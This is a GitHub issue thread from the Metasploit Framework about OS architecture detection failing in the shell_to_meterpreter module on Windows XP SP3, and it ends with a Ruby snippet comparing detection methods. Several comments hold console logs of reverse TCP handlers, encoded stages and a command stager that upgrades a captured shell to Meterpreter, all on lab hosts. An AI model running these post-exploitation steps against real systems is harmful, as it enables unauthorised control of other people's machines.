rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

shell_to_meterpreter: OS architecture detection fails on Windows XP SP3 #16785

Closed bcoles closed 1 year ago

bcoles commented 2 years ago

post/multi/manage/shell_to_meterpreter fails on Windows XP SP3 x86 over a windows/shell/reverse_tcp session. Meterpreter supports Windows XP SP3.

Since #15864, shell_to_meterpreter attempts to use wmic os get osarchitecture which is not a valid WMIC query on XP SP3.

https://github.com/rapid7/metasploit-framework/blob/f043b121b32664f545c9d96ca43bb7fe84f6385a/modules/post/multi/manage/shell_to_meterpreter.rb#L84-L100

msf6> use exploit/multi/handler 
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set lport 1338
lport => 1338
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.200.130:1338 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.216

[*] Command shell session 1 opened (192.168.200.130:1338 -> 192.168.200.216:1093) at 2022-07-19 03:50:31 -0400

Shell Banner:
Microsoft Windows XP [Version 5.1.2600]
-----

C:\Documents and Settings\user\Desktop>systeminfo
systeminfo

Host Name:                 EXPEE
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free

[...]

C:\Documents and Settings\user\Desktop>^Z
Background session 1? [y/N]  y
msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                                  Connection
  --  ----  ----               -----------                                                  ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows XP [Version 5.1.2600] -----  192.168.200.130:1338 -> 192.168.200.216:1093 (192.168.200.216)

vAdrian2424 commented 2 years ago

same here

juansonnn commented 2 years ago

Same here. Any news?

juansonnn commented 2 years ago

Looking here https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb

At line 88, not sure if the syntax is correct.

Salazar33 commented 2 years ago

Yep, getting the same issue while upgrading shell to meterpreter

nellaisamurai commented 2 years ago

any solutions???

adfoster-r7 commented 1 year ago

Cross-referencing: https://github.com/rapid7/metasploit-framework/pull/17336 - potentially better OS architecture detection would be a good follow-on from the OS version detection API PR

Young-Lord commented 1 year ago

same.

  Id  Name  Type               Information                                                                      Connection
  --  ----  ----               -----------                                                                      ----------
  5         shell x64/windows  Shell Banner: Microsoft Windows [_ 10.0.19045.2965] (c) Microsoft Corporatio...  192.168.1.1:7777 -> 192.168.1.1:33333 (192.168.1.1)

zhanglinqiang commented 1 year ago

Also occurred on windows10 1903.

msf6 post(multi/manage/shell_to_meterpreter) > run 

[*] Upgrading session ID: 5
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type               Information                                              Connection
  --  ----  ----               -----------                                              ----------
  5         shell x64/windows  Shell Banner: Microsoft Windows [_ 10.0.18362.30] -----  10.65.106.99:4444 -> 10.65.106.99:47773 (172.16.1.139)

msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 5
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 

Vulnerable target env is windows 10 1903(CVE-2020-0796)

msf6 post(multi/manage/shell_to_meterpreter) > sessions 5
[*] Starting interaction with 5...

Shell Banner:
Microsoft Windows [_ 10.0.18362.30]
-----

C:\Windows\system32>
C:\Windows\system32>systeminfo
systeminfo

主机名:           DESKTOP-O0U77NO
OS 名称:          Microsoft Windows 10 专业版
OS 版本:          10.0.18362 暂缺 Build 18362
OS 制造商:        Microsoft Corporation
OS 配置:          独立工作站
OS 构建类型:      Multiprocessor Free

bcoles commented 1 year ago

Also occurred on windows10 1903.

This is a different issue. #17896

zgoldman-r7 commented 1 year ago

Looks like this issue can be closed now; it was resolved by https://github.com/rapid7/metasploit-framework/pull/18062, which no longer uses wmic and currently detects the target architecture:

Target:

msf6 payload(windows/shell/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

Shell Banner:
'\\vmware-host\Shared Folders\Desktop'
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported.  Defaulting to Windows directory.
-----

C:\WINDOWS>systeminfo
systeminfo

Host Name:                 ZACH-F90A9C7F47
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free

Module working:

msf6 payload(windows/shell/reverse_tcp) > sessions -u -1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [-1]

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.2.1:4433
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
[*] Command stager progress: 3.33% (3398/102108 bytes)
[*] Command stager progress: 4.99% (5097/102108 bytes)
.... etc etc....
[*] Command stager progress: 96.51% (98542/102108 bytes)
[*] Command stager progress: 98.15% (100216/102108 bytes)
[*] Command stager progress: 99.78% (101888/102108 bytes)
[*] Sending stage (175686 bytes) to 192.168.2.135
[*] Command stager progress: 100.00% (102108/102108 bytes)
msf6 payload(windows/shell/reverse_tcp) >
[*] Meterpreter session 3 opened (192.168.2.1:4433 -> 192.168.2.135:1163) at 2023-10-23 10:32:18 -0500

Works as expected with the ENV detection:

[Screenshot omitted: 2023-10-23 10:52:49 AM]
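The two detection strategies discussed in this thread (the wmic query from the original report and the environment-based check from the closing comment), as an added example that is not the shell_to_meterpreter module's own code. It assumes the environment check reads PROCESSOR_ARCHITECTURE and PROCESSOR_ARCHITEW6432; the sample command outputs are constructed, and the XP error text is an approximation.

```ruby
# Classify from `wmic os get osarchitecture` output. Windows XP SP3 has no
# OSArchitecture property, so the query errors out and the output contains
# neither "32-bit" nor "64-bit"; a naive classifier then falls through to the
# "unsupported architecture" branch the issue reports.
def arch_from_wmic(output)
  return :x64 if output =~ /64-bit/i
  return :x86 if output =~ /32-bit/i
  :unsupported # wmic error text or empty output lands here
end

# Classify from `echo %PROCESSOR_ARCHITECTURE% %PROCESSOR_ARCHITEW6432%` output.
# cmd.exe echoes an unset variable literally, so a missing PROCESSOR_ARCHITEW6432
# shows up as the string "%PROCESSOR_ARCHITEW6432%". When it is set, the shell
# is a 32-bit process under WOW64 and the OS architecture is the WOW64 value.
def arch_from_env(output)
  arch, wow64 = output.strip.split(/\s+/)
  effective = (wow64.nil? || wow64.start_with?('%')) ? arch : wow64
  case effective
  when /\AAMD64\z/i then :x64
  when /\Ax86\z/i   then :x86
  when /\AARM64\z/i then :arm64
  when /\AARM\z/i   then :arm
  else :unsupported
  end
end

# Constructed sample outputs (not captured from a real host).
WMIC_XP_SP3   = "Node - EXPEE\r\nERROR:\r\nDescription = Invalid query\r\n"
WMIC_X64      = "OSArchitecture  \r\n64-bit          \r\n"
ENV_XP_X86    = "x86 %PROCESSOR_ARCHITEW6432%"   # 32-bit XP, no WOW64
ENV_WOW64     = "x86 AMD64"                      # 32-bit cmd on 64-bit Windows
ENV_NATIVE_64 = "AMD64 %PROCESSOR_ARCHITEW6432%" # 64-bit cmd on 64-bit Windows

if __FILE__ == $PROGRAM_NAME
  puts "wmic on XP SP3: #{arch_from_wmic(WMIC_XP_SP3)}"   # unsupported (the bug)
  puts "env  on XP SP3: #{arch_from_env(ENV_XP_X86)}"     # x86
  puts "env  under WOW64: #{arch_from_env(ENV_WOW64)}"    # x64
end
```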